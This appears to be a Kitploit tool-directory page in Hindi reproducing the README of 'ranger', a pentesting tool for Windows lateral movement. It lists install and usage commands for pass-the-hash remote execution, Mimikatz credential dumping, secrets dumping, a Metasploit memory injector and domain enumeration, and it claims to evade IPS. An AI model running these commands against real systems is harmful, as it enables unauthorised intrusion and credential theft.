Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ranger — सुरक्षा पेशेवरों के लिए एक उपकरण जो रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुँचने और उनके साथ बातचीत करने के लिए है। | Kitploit
उपकरण/GitHubGitHub/funkandwagnalls/ranger
पेलोड जनरेशनशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubfunkandwagnalls/ranger

ranger

सुरक्षा पेशेवरों के लिए एक उपकरण जो रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुँचने और उनके साथ बातचीत करने के लिए है।

रिपॉजिटरी देखें
431821610 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ranger

सुरक्षा पेशेवरों को रिमोट माइक्रोसॉफ्ट विंडोज आधारित सिस्टम तक पहुंचने और उनके साथ बातचीत करने में सहायता करने के लिए एक उपकरण।

यह परियोजना इस सोच के साथ बनाई गई थी, हमने धनुष या तीर का आविष्कार नहीं किया, बल्कि इसका उपयोग करने का एक अधिक कुशल तरीका बनाया।

Ranger एक कमांड-लाइन संचालित हमले और पैठ परीक्षण उपकरण है, जिसमें विंडोज सिस्टम के खिलाफ क्षमताओं को वितरित करने के लिए एक तत्काल कैटपल्ट सर्वर का उपयोग करने की क्षमता है। जब तक किसी उपयोगकर्ता के पास क्रेडेंशियल्स या हैश सेट (NTLM, LM, LM:NTLM) होता है, वह उन सिस्टमों तक पहुंच प्राप्त कर सकता है जो ट्रस्ट का हिस्सा हैं।

इस क्षमता का उपयोग करके एक सुरक्षा पेशेवर मेमोरी से क्लियर-टेक्स्ट में क्रेडेंशियल्स निकाल सकता है, SAM टेबल्स तक पहुंच सकता है, कमांड चला सकता है, PowerShell स्क्रिप्ट, विंडोज बाइनरी, और अन्य उपकरण निष्पादित कर सकता है। इस समय, यह उपकरण अधिकांश IPS विक्रेता समाधानों को बायपास करता है जब तक कि उन्हें विशेष रूप से इसका पता लगाने के लिए ट्यून नहीं किया गया हो। यह उपकरण हमारे होम लैब्स का उपयोग करके विकसित किया गया था, ताकि कानूनी और/या अनुबंधित रूप से समर्थित गतिविधियों को करने वाले सुरक्षा पेशेवरों का समर्थन किया जा सके।

अधिक कार्यक्षमता जोड़ी जा रही है, लेकिन इस समय यह उपकरण PowerShell PowerView, PowerShell Mimikatz और Impacket टीमों से संबंधित रिपॉजिटरी के समुदाय योगदानों का उपयोग करता है।

Ranger प्रबंधित करना:

इंस्टॉल:

wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

अपडेट:

ranger --update

उपयोग:

  • Ranger विधियों और हमलों का एक संयोजन उपयोग करता है, एक विधि का उपयोग हमले/कमांड को वितरित करने के लिए किया जाता है
  • एक हमला वह है जो आप पूरा करने का प्रयास कर रहे हैं
  • कुछ आइटम एक ही समय में एक विधि और हमला दोनों होते हैं और कुछ विधियां लाइब्रेरी या प्रोटोकॉल में वर्तमान सीमाओं के कारण कुछ हमलों का उपयोग नहीं कर सकती हैं

विधियां और हमले:

--scout
--secrets-dump

विधि:

--wmiexec
--psexec
--smbexec
--atexec

हमला:

--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

##कमांड निष्पादन: ###लॉग इन उपयोगकर्ता खोजें:

ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

###SMBEXEC कमांड शेल:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

###PSEXEC कमांड शेल:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

###PSEXEC कमांड निष्पादन:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

###WMIEXEC कमांड निष्पादन:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

###WMIEXEC PowerShell Mimikatz मेमोरी इंजेक्टर:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

###WMIEXEC Metasploit web_delivery मेमोरी इंजेक्टर (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

###WMIEXEC कस्टम कोड मेमोरी इंजेक्टर:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds"

###ATEXEC कमांड निष्पादन:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

###ATEXEC PowerShell Mimikatz मेमोरी इंजेक्टर:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder

###ATEXEC Metasploit web_delivery मेमोरी इंजेक्टर (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder

###ATEXEC कस्टम कोड मेमोरी इंजेक्टर:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -x "im.ps1" -f "Invoke-Mimikatz -DumpCreds" --no-encoder

###SECRETSDUMP कस्टम कोड मेमोरी इंजेक्टर:

ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

###पेस्ट करने योग्य Mimikatz हमला बनाएं:

ranger.py --invoker -q -v -vv -vvv

###पेस्ट करने योग्य web_delivery हमला बनाएं (नीचे Metasploit कॉन्फ़िगरेशन आवश्यक है):

ranger.py --downloader -q -v -vv -vvv

###पेस्ट करने योग्य Executor हमला बनाएं:

ranger.py --executor -q -v -vv -vvv

समूह सदस्यों और डोमेन की पहचान

  • समूहों की पहचान करते समय सुनिश्चित करें कि --get-domain-membership के साथ वास्तविक क्वेरी डोमेन का निर्धारण करें
  • फिर जब आप एक समूह से क्वेरी करते हैं तो वैकल्पिक --domain का उपयोग करें, जो आपको उस डोमेन से अलग डोमेन को लक्षित करने की अनुमति देता है जिसमें आपने लॉगिन किया था
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

##उपयोग के बारे में नोट्स: ###क्रेड फ़ाइल फ़ॉर्मेट:

  • आप इसे उपयोगकर्ता नामों और पासवर्ड या हैश की एक सूची निम्नलिखित प्रारूप में एक ही फ़ाइल में पास कर सकते हैं:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM  domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain

###क्रेडेंशियल फ़ाइल चेतावनियां:

  • यदि आप फ़ाइल में डोमेन नाम प्रदान करते हैं तो वे डिफ़ॉल्ट WORKGROUP के बजाय उपयोग किए जाएंगे।
  • यदि आप कमांड लाइन -d के माध्यम से डोमेन नाम प्रदान करते हैं, तो यह अनुमान लगाएगा कि आप फ़ाइल में सभी डोमेन नामों को अनदेखा करना चाहते हैं।

###कमांड लाइन निष्पादन:

  • यदि आप फ़ाइल का उपयोग नहीं करना चाहते हैं तो आप विवरण सीधे कमांड लाइन के माध्यम से पास कर सकते हैं।
  • यदि आप पासवर्ड के बजाय हैश प्रदान करना चाहते हैं तो उन्हें पासवर्ड तर्क के माध्यम से पास करें।
  • यदि वे PWDUMP प्रारूप में हैं और आप कोई उपयोगकर्ता नाम प्रदान नहीं करते हैं तो यह हैश से उपयोगकर्ता नाम निकाल लेगा।
  • यदि आप एक उपयोगकर्ता नाम प्रदान करते हैं तो यह सोचेगा कि समान हैश एक अलग उपयोगकर्ता पर लागू होता है।
  • पासवर्ड के लिए निम्नलिखित प्रारूपों का उपयोग करें:
password
LM:NTLM
:NTLM
PWDUMP

###लक्ष्य और बहिष्करण:

  • लक्ष्य और बहिष्करण एक ही समय में उपयोग किए जा सकते हैं

####लक्ष्य, लक्ष्य श्रेणियाँ, लक्ष्य CIDRs, लक्ष्य सूचियाँ, NMAP XML लक्ष्य:

  • आप लक्ष्य सूची या लक्ष्य विकल्प के माध्यम से लक्ष्यों की एक सूची प्रदान कर सकते हैं।
  • आप अल्पविराम द्वारा अलग करके कई लक्ष्य सूची फ़ाइलें प्रदान कर सकते हैं और यह डेटा को एकत्रित करेगा और डुप्लिकेट हटा देगा और फिर आपके IP पते को डिफ़ॉल्ट इंटरफ़ेस या आपके द्वारा प्रदान किए गए इंटरफ़ेस से बाहर कर देगा।
  • उपकरण CIDR नोटेशन, छोटी श्रेणियाँ (192.168.195.1-100) या बड़ी श्रेणियाँ (192.168.194.1-192.163.1.1) या एकल IP पते स्वीकार करता है।
  • फिर से, बस उन्हें कमांड लाइन द्वारा अल्पविराम से अलग करें या उन्हें एक नई पंक्ति द्वारा सीमांकित फ़ाइल में रखें।
  • Nmap XML का उपयोग सिस्टम को लक्षित करने के लिए भी किया जा सकता है, इसे भी अल्पविराम द्वारा अलग किया जा सकता है
  • उपकरण बक्सों को लक्षित करने से पहले सामान्यीकृत करेगा और डुप्लिकेट हटा देगा
  • उदाहरण: -t 192.168.195.1-100,192.168.195.200-192.168.198.3 -tl list1,list2,lis3 -tnX scan1.xml,scan2.xml

####बहिष्करण, बहिष्करण श्रेणियाँ, बहिष्करण CIDRs, बहिष्करण सूचियाँ, Nmap XML बहिष्करण:

  • आप बहिष्करण तर्कों का उपयोग करके लक्ष्यों को बाहर कर सकते हैं, इसलिए यदि आप क्लास A में से एक छोटे क्लास C को नहीं छूते हैं तो यह आपके लिए पता लगा लेगा।
  • बहिष्करण ठीक उसी तरह से किए जा सकते हैं जैसे लक्ष्य, बस कमांड में t को e से बदलें
  • उदाहरण: -e 192.168.195.1-100,192.168.195.200-192.168.198.3 -el list1,list2,lis3 -enX scan1.xml,scan2.xml
टूल डाउनलोड करें